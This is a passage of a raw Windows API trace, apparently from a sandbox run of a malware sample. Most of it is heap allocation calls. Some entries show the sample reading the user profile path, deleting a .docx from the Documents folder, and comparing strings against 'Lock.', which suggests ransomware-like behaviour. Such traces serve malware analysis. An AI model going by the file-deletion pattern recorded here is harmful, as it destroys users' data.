hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0260.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0260.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0260.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0260.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0260.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0260.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0260.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0260.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3571018 | out: hHeap=0x25c0000) returned 1 [0260.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0260.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0260.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0260.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0260.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0260.296] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0260.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0260.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0260.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0260.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0260.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0260.297] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0260.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0260.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0260.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0260.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0260.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0260.297] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0260.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0260.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0260.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0260.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0260.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0260.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0260.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0260.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0260.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0260.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0260.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0260.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0260.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x80) returned 0x24f2068 [0260.299] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/46_piKwe1cHySGVu21.docx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\46_piKwe1cHySGVu21.docx", lpFilePart=0x8bedfc*="46_piKwe1cHySGVu21.docx") returned 0x3f [0260.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0260.299] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\46_piKwe1cHySGVu21.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\46_pikwe1chysgvu21.docx")) returned 0x20 [0260.299] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\46_piKwe1cHySGVu21.docx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3443a920, ftCreationTime.dwHighDateTime=0x1d4fa89, ftLastAccessTime.dwLowDateTime=0xbf6275a0, ftLastAccessTime.dwHighDateTime=0x1d48409, ftLastWriteTime.dwLowDateTime=0xbf6275a0, ftLastWriteTime.dwHighDateTime=0x1d48409, nFileSizeHigh=0x0, nFileSizeLow=0x7a1a, dwReserved0=0x19e7, dwReserved1=0x4, cFileName="46_piKwe1cHySGVu21.docx", cAlternateFileName="46_PIK~1.DOC")) returned 0xaa57a0 [0260.300] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\46_piKwe1cHySGVu21.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\46_pikwe1chysgvu21.docx")) returned 1 [0260.302] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3443a920, ftCreationTime.dwHighDateTime=0x1d4fa89, ftLastAccessTime.dwLowDateTime=0xbf6275a0, ftLastAccessTime.dwHighDateTime=0x1d48409, ftLastWriteTime.dwLowDateTime=0xbf6275a0, ftLastWriteTime.dwHighDateTime=0x1d48409, nFileSizeHigh=0x0, nFileSizeLow=0x7a1a, dwReserved0=0x19e7, dwReserved1=0x4, cFileName="46_piKwe1cHySGVu21.docx", cAlternateFileName="46_PIK~1.DOC")) returned 0 [0260.302] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0260.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0260.303] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0260.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0260.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0260.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0260.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0260.303] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0260.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0260.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0260.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0260.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0260.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0260.304] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0260.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0260.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0260.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0260.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0260.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0260.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0260.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0260.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0260.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0260.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0260.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0260.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0260.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0260.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0260.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0260.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0260.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x80) returned 0x24f2068 [0260.307] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/46_piKwe1cHySGVu21.docx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\46_piKwe1cHySGVu21.docx", lpFilePart=0x8bf658*="46_piKwe1cHySGVu21.docx") returned 0x3f [0260.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0260.307] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\46_piKwe1cHySGVu21.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\46_pikwe1chysgvu21.docx")) returned 0xffffffff [0260.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0260.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0260.307] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0260.308] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.308] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0260.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0260.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0260.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0260.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0260.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0260.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0260.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0260.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0260.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="52zSkSwJyavPCLOxO1y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2zSkSwJyavPCLOxO1y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zSkSwJyavPCLOxO1y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SkSwJyavPCLOxO1y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kSwJyavPCLOxO1y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SwJyavPCLOxO1y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wJyavPCLOxO1y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JyavPCLOxO1y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yavPCLOxO1y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avPCLOxO1y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vPCLOxO1y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PCLOxO1y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CLOxO1y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOxO1y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.309] CompareStringW (Locale=0x400, 